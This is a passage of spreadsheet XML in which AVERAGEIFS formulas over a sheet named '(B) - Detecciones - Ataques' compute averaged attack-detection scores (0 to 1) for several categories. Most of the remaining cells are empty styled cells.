        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AJ224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AK224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AL224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AM224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AN224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AO224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AP224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AR224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AS224" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AT224" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="AU224" s="271"/>
      <c r="AV224" s="271"/>
      <c r="AW224" s="271"/>
      <c r="AX224" s="271"/>
      <c r="AY224" s="271"/>
      <c r="AZ224" s="271"/>
      <c r="BA224" s="271"/>
      <c r="BB224" s="271"/>
      <c r="BC224" s="271"/>
      <c r="BD224" s="271"/>
      <c r="BE224" s="271"/>
      <c r="BF224" s="271"/>
      <c r="BG224" s="271"/>
      <c r="BH224" s="271"/>
      <c r="BI224" s="271"/>
      <c r="BJ224" s="271"/>
      <c r="BK224" s="271"/>
      <c r="BL224" s="271"/>
      <c r="BM224" s="271"/>
      <c r="BN224" s="271"/>
      <c r="BO224" s="271"/>
      <c r="BP224" s="271"/>
      <c r="BQ224" s="271"/>
      <c r="BR224" s="271"/>
      <c r="BS224" s="271"/>
      <c r="BT224" s="271"/>
      <c r="BU224" s="271"/>
      <c r="BV224" s="271"/>
      <c r="BW224" s="271"/>
      <c r="BX224" s="271"/>
      <c r="BY224" s="271"/>
      <c r="BZ224" s="271"/>
      <c r="CA224" s="271"/>
      <c r="CB224" s="271"/>
      <c r="CC224" s="271"/>
      <c r="CD224" s="271"/>
      <c r="CE224" s="271"/>
      <c r="CF224" s="271"/>
      <c r="CG224" s="271"/>
      <c r="CH224" s="271"/>
      <c r="CI224" s="271"/>
      <c r="CJ224" s="271"/>
      <c r="CK224" s="271"/>
      <c r="CL224" s="271"/>
      <c r="CM224" s="271"/>
      <c r="CN224" s="271"/>
      <c r="CO224" s="271"/>
      <c r="CP224" s="271"/>
      <c r="CQ224" s="271"/>
      <c r="CR224" s="271"/>
      <c r="CS224" s="271"/>
      <c r="CT224" s="271"/>
      <c r="CU224" s="271"/>
      <c r="CV224" s="271"/>
      <c r="CW224" s="271"/>
      <c r="CX224" s="271"/>
      <c r="CY224" s="271"/>
      <c r="CZ224" s="271"/>
      <c r="DA224" s="271"/>
      <c r="DB224" s="271"/>
      <c r="DC224" s="271"/>
      <c r="DD224" s="271"/>
      <c r="DE224" s="271"/>
      <c r="DF224" s="271"/>
      <c r="DG224" s="271"/>
      <c r="DH224" s="271"/>
      <c r="DI224" s="271"/>
      <c r="DJ224" s="271"/>
      <c r="DK224" s="271"/>
    </row>
    <row r="225">
      <c r="Q225" s="271"/>
      <c r="R225" s="510"/>
      <c r="S225" s="510"/>
      <c r="T225" s="510"/>
      <c r="U225" s="510"/>
      <c r="V225" s="510"/>
      <c r="W225" s="510"/>
      <c r="X225" s="271"/>
      <c r="Y225" s="271"/>
      <c r="Z225" s="271"/>
      <c r="AA225" s="271"/>
      <c r="AB225" s="271"/>
      <c r="AC225" s="271"/>
      <c r="AD225" s="271"/>
      <c r="AE225" s="271"/>
      <c r="AF225" s="271"/>
      <c r="AG225" s="271"/>
      <c r="AH225" s="352" t="s">
        <v>2215</v>
      </c>
      <c r="AI225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS225" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT225" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU225" s="271"/>
      <c r="AV225" s="271"/>
      <c r="AW225" s="271"/>
      <c r="AX225" s="271"/>
      <c r="AY225" s="271"/>
      <c r="AZ225" s="271"/>
      <c r="BA225" s="271"/>
      <c r="BB225" s="271"/>
      <c r="BC225" s="271"/>
      <c r="BD225" s="271"/>
      <c r="BE225" s="271"/>
      <c r="BF225" s="271"/>
      <c r="BG225" s="271"/>
      <c r="BH225" s="271"/>
      <c r="BI225" s="271"/>
      <c r="BJ225" s="271"/>
      <c r="BK225" s="271"/>
      <c r="BL225" s="271"/>
      <c r="BM225" s="271"/>
      <c r="BN225" s="271"/>
      <c r="BO225" s="271"/>
      <c r="BP225" s="271"/>
      <c r="BQ225" s="271"/>
      <c r="BR225" s="271"/>
      <c r="BS225" s="271"/>
      <c r="BT225" s="271"/>
      <c r="BU225" s="271"/>
      <c r="BV225" s="271"/>
      <c r="BW225" s="271"/>
      <c r="BX225" s="271"/>
      <c r="BY225" s="271"/>
      <c r="BZ225" s="271"/>
      <c r="CA225" s="271"/>
      <c r="CB225" s="271"/>
      <c r="CC225" s="271"/>
      <c r="CD225" s="271"/>
      <c r="CE225" s="271"/>
      <c r="CF225" s="271"/>
      <c r="CG225" s="271"/>
      <c r="CH225" s="271"/>
      <c r="CI225" s="271"/>
      <c r="CJ225" s="271"/>
      <c r="CK225" s="271"/>
      <c r="CL225" s="271"/>
      <c r="CM225" s="271"/>
      <c r="CN225" s="271"/>
      <c r="CO225" s="271"/>
      <c r="CP225" s="271"/>
      <c r="CQ225" s="271"/>
      <c r="CR225" s="271"/>
      <c r="CS225" s="271"/>
      <c r="CT225" s="271"/>
      <c r="CU225" s="271"/>
      <c r="CV225" s="271"/>
      <c r="CW225" s="271"/>
      <c r="CX225" s="271"/>
      <c r="CY225" s="271"/>
      <c r="CZ225" s="271"/>
      <c r="DA225" s="271"/>
      <c r="DB225" s="271"/>
      <c r="DC225" s="271"/>
      <c r="DD225" s="271"/>
      <c r="DE225" s="271"/>
      <c r="DF225" s="271"/>
      <c r="DG225" s="271"/>
      <c r="DH225" s="271"/>
      <c r="DI225" s="271"/>
      <c r="DJ225" s="271"/>
      <c r="DK225" s="271"/>
    </row>
    <row r="226">
      <c r="Q226" s="271"/>
      <c r="R226" s="510"/>
      <c r="S226" s="510"/>
      <c r="T226" s="510"/>
      <c r="U226" s="510"/>
      <c r="V226" s="510"/>
      <c r="W226" s="510"/>
      <c r="X226" s="271"/>
      <c r="Y226" s="271"/>
      <c r="Z226" s="271"/>
      <c r="AA226" s="271"/>
      <c r="AB226" s="271"/>
      <c r="AC226" s="271"/>
      <c r="AD226" s="271"/>
      <c r="AE226" s="271"/>
      <c r="AF226" s="271"/>
      <c r="AG226" s="271"/>
      <c r="AH226" s="352" t="s">
        <v>2261</v>
      </c>
      <c r="AI226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AK226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AL226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AM226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AN226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AO226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AP226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AR226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AS226" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AT226" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="AU226" s="271"/>
      <c r="AV226" s="271"/>
      <c r="AW226" s="271"/>
      <c r="AX226" s="271"/>
      <c r="AY226" s="271"/>
      <c r="AZ226" s="271"/>
      <c r="BA226" s="271"/>
      <c r="BB226" s="271"/>
      <c r="BC226" s="271"/>
      <c r="BD226" s="271"/>
      <c r="BE226" s="271"/>
      <c r="BF226" s="271"/>
      <c r="BG226" s="271"/>
      <c r="BH226" s="271"/>
      <c r="BI226" s="271"/>
      <c r="BJ226" s="271"/>
      <c r="BK226" s="271"/>
      <c r="BL226" s="271"/>
      <c r="BM226" s="271"/>
      <c r="BN226" s="271"/>
      <c r="BO226" s="271"/>
      <c r="BP226" s="271"/>
      <c r="BQ226" s="271"/>
      <c r="BR226" s="271"/>
      <c r="BS226" s="271"/>
      <c r="BT226" s="271"/>
      <c r="BU226" s="271"/>
      <c r="BV226" s="271"/>
      <c r="BW226" s="271"/>
      <c r="BX226" s="271"/>
      <c r="BY226" s="271"/>
      <c r="BZ226" s="271"/>
      <c r="CA226" s="271"/>
      <c r="CB226" s="271"/>
      <c r="CC226" s="271"/>
      <c r="CD226" s="271"/>
      <c r="CE226" s="271"/>
      <c r="CF226" s="271"/>
      <c r="CG226" s="271"/>
      <c r="CH226" s="271"/>
      <c r="CI226" s="271"/>
      <c r="CJ226" s="271"/>
      <c r="CK226" s="271"/>
      <c r="CL226" s="271"/>
      <c r="CM226" s="271"/>
      <c r="CN226" s="271"/>
      <c r="CO226" s="271"/>
      <c r="CP226" s="271"/>
      <c r="CQ226" s="271"/>
      <c r="CR226" s="271"/>
      <c r="CS226" s="271"/>
      <c r="CT226" s="271"/>
      <c r="CU226" s="271"/>
      <c r="CV226" s="271"/>
      <c r="CW226" s="271"/>
      <c r="CX226" s="271"/>
      <c r="CY226" s="271"/>
      <c r="CZ226" s="271"/>
      <c r="DA226" s="271"/>
      <c r="DB226" s="271"/>
      <c r="DC226" s="271"/>
      <c r="DD226" s="271"/>
      <c r="DE226" s="271"/>
      <c r="DF226" s="271"/>
      <c r="DG226" s="271"/>
      <c r="DH226" s="271"/>
      <c r="DI226" s="271"/>
      <c r="DJ226" s="271"/>
      <c r="DK226" s="271"/>
    </row>
    <row r="227">
      <c r="Q227" s="271"/>
      <c r="R227" s="510"/>
      <c r="S227" s="510"/>
      <c r="T227" s="510"/>
      <c r="U227" s="510"/>
      <c r="V227" s="510"/>
      <c r="W227" s="510"/>
      <c r="X227" s="271"/>
      <c r="Y227" s="271"/>
      <c r="Z227" s="271"/>
      <c r="AA227" s="271"/>
      <c r="AB227" s="271"/>
      <c r="AC227" s="271"/>
      <c r="AD227" s="271"/>
      <c r="AE227" s="271"/>
      <c r="AF227" s="271"/>
      <c r="AG227" s="271"/>
      <c r="AH227" s="352" t="s">
        <v>359</v>
      </c>
      <c r="AI227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AK227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AL227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AM227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AN227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AO227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AP227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AR227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AS227" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AT227" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="AU227" s="271"/>
      <c r="AV227" s="271"/>
      <c r="AW227" s="271"/>
      <c r="AX227" s="271"/>
      <c r="AY227" s="271"/>
      <c r="AZ227" s="271"/>
      <c r="BA227" s="271"/>
      <c r="BB227" s="271"/>
      <c r="BC227" s="271"/>
      <c r="BD227" s="271"/>
      <c r="BE227" s="271"/>
      <c r="BF227" s="271"/>
      <c r="BG227" s="271"/>
      <c r="BH227" s="271"/>
      <c r="BI227" s="271"/>
      <c r="BJ227" s="271"/>
      <c r="BK227" s="271"/>
      <c r="BL227" s="271"/>
      <c r="BM227" s="271"/>
      <c r="BN227" s="271"/>
      <c r="BO227" s="271"/>
      <c r="BP227" s="271"/>
      <c r="BQ227" s="271"/>
      <c r="BR227" s="271"/>
      <c r="BS227" s="271"/>
      <c r="BT227" s="271"/>
      <c r="BU227" s="271"/>
      <c r="BV227" s="271"/>
      <c r="BW227" s="271"/>
      <c r="BX227" s="271"/>
      <c r="BY227" s="271"/>
      <c r="BZ227" s="271"/>
      <c r="CA227" s="271"/>
      <c r="CB227" s="271"/>
      <c r="CC227" s="271"/>
      <c r="CD227" s="271"/>
      <c r="CE227" s="271"/>
      <c r="CF227" s="271"/>
      <c r="CG227" s="271"/>
      <c r="CH227" s="271"/>
      <c r="CI227" s="271"/>
      <c r="CJ227" s="271"/>
      <c r="CK227" s="271"/>
      <c r="CL227" s="271"/>
      <c r="CM227" s="271"/>
      <c r="CN227" s="271"/>
      <c r="CO227" s="271"/>
      <c r="CP227" s="271"/>
      <c r="CQ227" s="271"/>
      <c r="CR227" s="271"/>
      <c r="CS227" s="271"/>
      <c r="CT227" s="271"/>
      <c r="CU227" s="271"/>
      <c r="CV227" s="271"/>
      <c r="CW227" s="271"/>
      <c r="CX227" s="271"/>
      <c r="CY227" s="271"/>
      <c r="CZ227" s="271"/>
      <c r="DA227" s="271"/>
      <c r="DB227" s="271"/>
      <c r="DC227" s="271"/>
      <c r="DD227" s="271"/>
      <c r="DE227" s="271"/>
      <c r="DF227" s="271"/>
      <c r="DG227" s="271"/>
      <c r="DH227" s="271"/>
      <c r="DI227" s="271"/>
      <c r="DJ227" s="271"/>
      <c r="DK227" s="271"/>
    </row>
    <row r="228">
      <c r="L228" s="570"/>
      <c r="M228" s="570"/>
      <c r="N228" s="570"/>
      <c r="O228" s="570"/>
      <c r="Q228" s="271"/>
      <c r="R228" s="510"/>
      <c r="S228" s="510"/>
      <c r="T228" s="510"/>
      <c r="U228" s="510"/>
      <c r="V228" s="510"/>
      <c r="W228" s="510"/>
      <c r="X228" s="271"/>
      <c r="Y228" s="271"/>
      <c r="Z228" s="271"/>
      <c r="AA228" s="271"/>
      <c r="AB228" s="271"/>
      <c r="AC228" s="271"/>
      <c r="AD228" s="271"/>
      <c r="AE228" s="271"/>
      <c r="AF228" s="271"/>
      <c r="AG228" s="271"/>
      <c r="AH228" s="352" t="s">
        <v>1230</v>
      </c>
      <c r="AI228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AJ228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AK228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AL228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AM228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AN228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AO228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AP228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AR228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AS228" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AT228" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="AU228" s="271"/>
      <c r="AV228" s="271"/>
      <c r="AW228" s="271"/>
      <c r="AX228" s="271"/>
      <c r="AY228" s="271"/>
      <c r="AZ228" s="271"/>
      <c r="BA228" s="271"/>
      <c r="BB228" s="271"/>
      <c r="BC228" s="271"/>
      <c r="BD228" s="271"/>
      <c r="BE228" s="271"/>
      <c r="BF228" s="271"/>
      <c r="BG228" s="271"/>
      <c r="BH228" s="271"/>
      <c r="BI228" s="271"/>
      <c r="BJ228" s="271"/>
      <c r="BK228" s="271"/>
      <c r="BL228" s="271"/>
      <c r="BM228" s="271"/>
      <c r="BN228" s="271"/>
      <c r="BO228" s="271"/>
      <c r="BP228" s="271"/>
      <c r="BQ228" s="271"/>
      <c r="BR228" s="271"/>
      <c r="BS228" s="271"/>
      <c r="BT228" s="271"/>
      <c r="BU228" s="271"/>
      <c r="BV228" s="271"/>
      <c r="BW228" s="271"/>
      <c r="BX228" s="271"/>
      <c r="BY228" s="271"/>
      <c r="BZ228" s="271"/>
      <c r="CA228" s="271"/>
      <c r="CB228" s="271"/>
      <c r="CC228" s="271"/>
      <c r="CD228" s="271"/>
      <c r="CE228" s="271"/>
      <c r="CF228" s="271"/>
      <c r="CG228" s="271"/>
      <c r="CH228" s="271"/>
      <c r="CI228" s="271"/>
      <c r="CJ228" s="271"/>
      <c r="CK228" s="271"/>
      <c r="CL228" s="271"/>
      <c r="CM228" s="271"/>
      <c r="CN228" s="271"/>
      <c r="CO228" s="271"/>
      <c r="CP228" s="271"/>
      <c r="CQ228" s="271"/>
      <c r="CR228" s="271"/>
      <c r="CS228" s="271"/>
      <c r="CT228" s="271"/>
      <c r="CU228" s="271"/>
      <c r="CV228" s="271"/>
      <c r="CW228" s="271"/>
      <c r="CX228" s="271"/>
      <c r="CY228" s="271"/>
      <c r="CZ228" s="271"/>
      <c r="DA228" s="271"/>
      <c r="DB228" s="271"/>
      <c r="DC228" s="271"/>
      <c r="DD228" s="271"/>
      <c r="DE228" s="271"/>
      <c r="DF228" s="271"/>
      <c r="DG228" s="271"/>
      <c r="DH228" s="271"/>
      <c r="DI228" s="271"/>
      <c r="DJ228" s="271"/>
      <c r="DK228" s="271"/>
    </row>
    <row r="229">
      <c r="L229" s="570"/>
      <c r="M229" s="570"/>
      <c r="N229" s="570"/>
      <c r="O229" s="570"/>
      <c r="Q229" s="271"/>
      <c r="R229" s="510"/>
      <c r="S229" s="510"/>
      <c r="T229" s="510"/>
      <c r="U229" s="510"/>
      <c r="V229" s="510"/>
      <c r="W229" s="510"/>
      <c r="X229" s="271"/>
      <c r="Y229" s="271"/>
      <c r="Z229" s="271"/>
      <c r="AA229" s="271"/>
      <c r="AB229" s="271"/>
      <c r="AC229" s="271"/>
      <c r="AD229" s="271"/>
      <c r="AE229" s="271"/>
      <c r="AF229" s="271"/>
      <c r="AG229" s="271"/>
      <c r="AH229" s="352" t="s">
        <v>1812</v>
      </c>
      <c r="AI229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AK229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AL229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="AM229" s="518">
